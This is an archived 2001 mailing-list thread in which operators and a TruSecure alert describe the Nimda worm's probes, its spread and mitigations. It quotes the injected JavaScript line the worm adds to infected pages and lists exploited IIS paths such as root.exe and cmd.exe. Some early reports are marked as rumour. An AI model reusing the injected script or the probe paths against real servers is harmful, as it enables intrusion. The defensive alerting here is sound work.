More information below.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Mark Radabaugh - Amplex
Sent: Tuesday, September 18, 2001 9:49 AM
To: [EMAIL PROTECTED]
Subject: RE: Worm probes
This is new - it modifies the web pages of the infected machine to
include a (I assume) virus.  It adds this string to the web page:

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

Viewing infected web servers may be dangerous.

Mark Radabaugh
Amplex
(419) 833-3635


-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
ravi pina
Sent: Tuesday, September 18, 2001 9:35 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: Worm probes
indeed.  scanning for strings that appear to be associated
with the Concept Virus(CV) V.5, there is a tremendous
increase in bandwidth usage.  today alone i match:

/scripts:    18013
/_vti_bin:     1885
_mem_bin:     1916
/ms_adc/:     1945
/winnt/system32:    27648

bugtraq is starting to get in the preliminary reports
of this worm.  beware that infected host's home pages
contain a javascript that sends you to a page that
attempts to send you a copy of the worm.  fantastic, eh?


-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Braun, Mike
Sent: Tuesday, September 18, 2001 9:34 AM
To: '[EMAIL PROTECTED]'
Subject: FW: Worm probes
I received this warning from TruSecure regarding the latest worm attack.

Mike Braun
First American CREDCO

-----Original Message-----
TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm

Date: September 18, 2001
Time:  1000 EDT

RISK INDICES:

Initial Assessment: RED HOT

Threat: VERY HIGH, (rapidly increasing)

Vulnerability Prevalence: VERY HIGH, affects IIS servers version 4.0,
5.0, and internal networks.

Cost: High, command execution is possible

Vulnerable Systems:  IIS 4.0 and 5.0

SUMMARY:
A new IIS worm is spreading rapidly.  Its working name is Nimda:
W32.nimda.a.mm

It started about 9am eastern time today, Tuesday, September 18, 2001.
Multiple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. It began at 9:08am.

The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:

Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin  owssvr.dll
Root.exe
CMD.EXE
../  (Unicode)
Getadmin.dll
Default.IDA
/Msoffice/  cltreq.asp

This is not code red or a code red variant.

The worm, like code red, attempts to infect its local sub net first,
then spreads beyond the local address space.

It is spreading very rapidly.

TruSecure  believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities.  We believe that there are
nearly 1Million such machines currently exposed to the Internet.

Risks Indices:
Vulnerability - VULNERABILITY PREVALENCE is very high - Millions of
Internet Web server hosts. TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high.

Threat - VERY HIGH and Growing. The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.

Cost --  Unknown, probably moderate per infected system.


The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.

Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.

Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.

We cannot discount the coincidence of the date and time of release,
exactly one week (probably to the minute) after the World Trade
Center attack.


REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread directly via IIS across the Internet (IP
spread).
It probably also spreads by local shares. (This is not known for
sure at this time.)
There is also an email vector where README.EXE is sent via email to
numerous accounts.

Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Eric Gauthier
Sent: Tuesday, September 18, 2001 9:55 AM
To: [EMAIL PROTECTED]
Subject: Re: Worm probes
> Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
> I've nailed a copy, and am working on getting it to the right security
> people.  A *PRELIMINARY* (eyeballing the output of 'strings') indicates that
> this one *both* sends itself via-email a la SirCam, *AND* scans for vulnerable
> web servers, and if it finds a vulnerable server, it causes anybody visiting
> that webpage to be offered a contaminated .exe as well.
> I do *NOT* have a handle on what malicious effects it has other than just
> propagating.

I work at a large university and our security guys think this guy is what's
been causing us problems all morning.  Lots of subnet scans (tons of
incomplete arps), CC Mail servers are wacking out, HPOV noting that
old 3Com gear is dropping etc.  This is what I've heard through the rumor
mill (so take it with a grain of salt)...

"...At first blush, it spreads itself via web, email, and maybe shares.
We've seen it spreading by a set of two HTTP requests.  It will look for
backdoors left behind by Code Red, such as /scripts/root.exe.  It uses tftp
to copy itself to the target machine then launches it via a second HTTP
command."

Eric :)

-----Original Message-----
From: Bryan Heitman [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:22 AM
To: [EMAIL PROTECTED]
Subject: Re: Worm probes
We're also seeing a large increase in this activity.  This seems to be more
severe than the first time.  Have an additional 30 to 40 meg inbound from
this.

Best regards,


Bryan Heitman
CommuniTech.Net, Inc.

----- Original Message -----
From: 
To: 
Sent: Tuesday, September 18, 2001 10:05 AM
Subject: Re: Worm probes

> ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k
> box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this
> time of day, although still well short of capacity...apache server
> processor load is WAY up just from the requests, and the logs are growing
> like mad.
>
> On Tue, 18 Sep 2001, deeann mikula wrote:
>
> >
> > On Tue, 18 Sep 2001, ravi pina wrote:
> >
> > >
> > > On Tue, Sep 18, 2001 at 09:54:31AM -0400, [EMAIL PROTECTED] said at one point in time:
> > > >
> > > >
> > > > Has anyone else been seeing a dramatic increase in /scripts/.. NT worm
> > > > probes this morning?  We're seeing about 8000/second, starting around 9:15
> > > > Eastern time, to and from a wide variety of addresses.
> > >
> > > affirmative.  i just looked at my logs, and it looks like
> > > each probe tries a bunch of things.  i haven't seen much
> > > on the lists, but i'm looking right now.
> >
> > i'm pretty sure that the worm's attack phase starts on the 20th (which
> > of course, depends upon a correctly set system clock) and also that
> > attempting to execute something like /scripts/root.ext/c++ something
> > is involved.
> >
> > i think that cert's website would be a good place to look.  i'm *not*
> > a security/virus chick, but i did host a talk by marty linder of cert
> > where he discected code red's activity and presented a summary.
> >
> > cert is of course, http://www.cert.org.
> >
> >
> > deeann m.m. mikula
> >
> > director of operations
> > telerama public access internet
> > http://www.telerama.com
> > 1.877.688.3200
> >
> >
> >
> >
>
> James Smallacombe       PlantageNet, Inc. CEO and Janitor
> [EMAIL PROTECTED]     http://3.am
> =========================================================================
Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=20294&t=20294